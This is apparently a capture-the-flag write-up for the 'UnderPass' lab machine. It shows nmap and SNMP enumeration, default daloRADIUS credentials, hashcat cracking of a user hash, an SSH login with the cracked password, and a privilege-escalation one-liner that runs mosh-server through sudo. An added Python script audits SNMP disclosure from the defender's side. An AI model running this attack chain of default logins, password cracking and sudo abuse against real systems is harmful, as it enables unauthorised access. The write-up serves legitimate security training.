Recon:

```
└─$ nmap -sC -sV -sU 10.10.11.48
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-07 09:33 IST
Stats: 0:01:27 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 12.30% done; ETC: 09:45 (0:10:20 remaining)
Nmap scan report for 10.10.11.48
Host is up (0.17s latency).
Not shown: 983 closed udp ports (port-unreach)
PORT      STATE         SERVICE      VERSION
80/udp    open|filtered http
161/udp   open          snmp         SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info:
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: c7ad5c4856d1cf6600000000
|   snmpEngineBoots: 31
|_  snmpEngineTime: 22m05s
| snmp-sysdescr: Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64
|_  System uptime: 22m5.39s (132539 timeticks)
1812/udp  open|filtered radius
1813/udp  open|filtered radacct
3702/udp  open|filtered ws-discovery
5000/udp  open|filtered upnp
16498/udp open|filtered unknown
17836/udp open|filtered unknown
19022/udp open|filtered unknown
20762/udp open|filtered unknown
21476/udp open|filtered unknown
23176/udp open|filtered unknown
25709/udp open|filtered unknown
33744/udp open|filtered unknown
44946/udp open|filtered unknown
51972/udp open|filtered unknown
54711/udp open|filtered unknown
Service Info: Host: UnDerPass.htb is the only daloradius server in the basin!
```
  • Ports 22 and 80 are open
  • Port 80 runs Apache 2.4.52
  • Port 161/udp runs SNMP

Enumeration:

  • Googled the version of Apache that is running.
  • This version has many vulnerabilities, but none worked.
```
snmpwalk -v1 -c public 10.129.189.64
iso.3.6.1.2.1.1.1.0 = STRING: "Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (943070) 2:37:10.70
iso.3.6.1.2.1.1.4.0 = STRING: "steve@underpass.htb"
iso.3.6.1.2.1.1.5.0 = STRING: "UnDerPass.htb is the only daloradius server in the basin!"
iso.3.6.1.2.1.1.6.0 = STRING: "Nevada, U.S.A. but not Vegas"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.10.3.1.1
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.11.3.1.1
iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.15.2.1.1
iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1
iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.6.3.16.2.2.1
iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.49
iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.50
iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.2.1.4
iso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3
iso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.2.1.92
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The SNMP Management Architecture MIB."
iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The MIB for Message Processing and Dispatching."
iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The management information definitions for the SNMP User-based Security Model."
iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities"
iso.3.6.1.2.1.1.9.1.3.5 = STRING: "View-based Access Control Model for SNMP."
iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing TCP implementations"
iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing UDP implementations"
iso.3.6.1.2.1.1.9.1.3.8 = STRING: "The MIB module for managing IP and ICMP implementations"
iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering."
iso.3.6.1.2.1.1.9.1.3.10 = STRING: "The MIB module for logging SNMP Notifications."
iso.3.6.1.2.1.1.9.1.4.1 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.2 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.3 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.4 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.5 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.6 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.7 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.8 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.9 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.10 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.25.1.1.0 = Timeticks: (945647) 2:37:36.47
iso.3.6.1.2.1.25.1.2.0 = Hex-STRING: 07 E8 0C 16 05 09 01 00 2B 00 00
iso.3.6.1.2.1.25.1.3.0 = INTEGER: 393216
iso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=/vmlinuz-5.15.0-126-generic root=/dev/mapper/ubuntu--vg-ubuntu--lv ro net.ifnames=0 biosdevname=0 "
iso.3.6.1.2.1.25.1.5.0 = Gauge32: 0
iso.3.6.1.2.1.25.1.6.0 = Gauge32: 228
iso.3.6.1.2.1.25.1.7.0 = INTEGER: 0
iso.3.6.1.2.1.25.1.7.0 = No more variables left in this MIB View (It is past the end of the MIB tree)
```
  • Linux Underpass 5.15.0
  • UnDerPass.htb is the only daloRADIUS server
  • The presence of a **daloRADIUS server** on **UnderPass.htb** could provide significant opportunities for enumeration and exploitation. **daloRADIUS** is a web-based front-end for managing FreeRADIUS, a RADIUS server implementation.
  • The daloRADIUS GitHub page shows a login.php at /app/user/login.php and another one at /app/operators/login.php
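
For the defender's side of the SNMP findings above, this added example (not part of the original notes) parses `snmpwalk` output in the numeric form shown and reports which disclosing objects the `public` community hands out. The object names are the standard SNMPv2-MIB and HOST-RESOURCES-MIB names; `DISCLOSING`, `parse_walk` and `audit` are hypothetical helper names, and the sample lines are constructed from the walk above.

```python
import re

# Constructed sample: a few lines in snmpwalk's output format, values copied from the walk above.
SAMPLE_WALK = """\
iso.3.6.1.2.1.1.1.0 = STRING: "Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64"
iso.3.6.1.2.1.1.3.0 = Timeticks: (943070) 2:37:10.70
iso.3.6.1.2.1.1.4.0 = STRING: "steve@underpass.htb"
iso.3.6.1.2.1.1.5.0 = STRING: "UnDerPass.htb is the only daloradius server in the basin!"
iso.3.6.1.2.1.1.6.0 = STRING: "Nevada, U.S.A. but not Vegas"
iso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=/vmlinuz-5.15.0-126-generic root=/dev/mapper/ubuntu--vg-ubuntu--lv ro net.ifnames=0 biosdevname=0 "
iso.3.6.1.2.1.25.1.7.0 = No more variables left in this MIB View (It is past the end of the MIB tree)
"""

# "<oid> = <TYPE>: <value>"; the OID may be printed as iso.3.6..., .1.3.6... or 1.3.6...
LINE_RE = re.compile(r"^(?:iso|\.?1)\.(?P<oid>[\d.]+) = (?P<type>[\w-]+): (?P<value>.*)$")
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")

# OID below iso(1) -> (standard MIB object name, what it discloses)
DISCLOSING = {
    "3.6.1.2.1.1.1.0": ("sysDescr", "OS and kernel version"),
    "3.6.1.2.1.1.4.0": ("sysContact", "contact, often a username or e-mail"),
    "3.6.1.2.1.1.5.0": ("sysName", "host name or role banner"),
    "3.6.1.2.1.1.6.0": ("sysLocation", "physical location"),
    "3.6.1.2.1.25.1.4.0": ("hrSystemInitialLoadParameters", "kernel command line"),
}

def parse_walk(text):
    """Return (oid, type, value) for every well-formed varbind line; skip the rest."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            rows.append((m["oid"], m["type"], m["value"].strip().strip('"').strip()))
    return rows

def audit(text):
    """List the disclosing objects present in a walk, with any e-mail addresses found."""
    findings = []
    for oid, _type, value in parse_walk(text):
        if oid in DISCLOSING and value:
            name, discloses = DISCLOSING[oid]
            findings.append({"object": name, "discloses": discloses,
                             "value": value, "emails": EMAIL_RE.findall(value)})
    return findings

if __name__ == "__main__":
    for f in audit(SAMPLE_WALK):
        print(f"{f['object']:<30} {f['discloses']:<36} {f['value']}")
```

Every object this reports is readable by anyone who can reach UDP 161 with the community string, so the fix is to replace the default community, restrict the view and source addresses, or move to SNMPv3 with authentication and privacy.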

  • default creds found in INSTALL

  • administrator:radius

  • database creds found steve:testing123
  • Since we have admin access, we can now read /mng-list-all.php to list all users

```
hashcat -m 0 -a 0 hash.txt ~/rockyou.txt
```
  • svcMosh:underwaterfriends

User Login:

```
ssh svcMosh@underpass.htb
```


Privilege Escalation:

```
mosh --server="sudo /usr/bin/mosh-server" localhost
```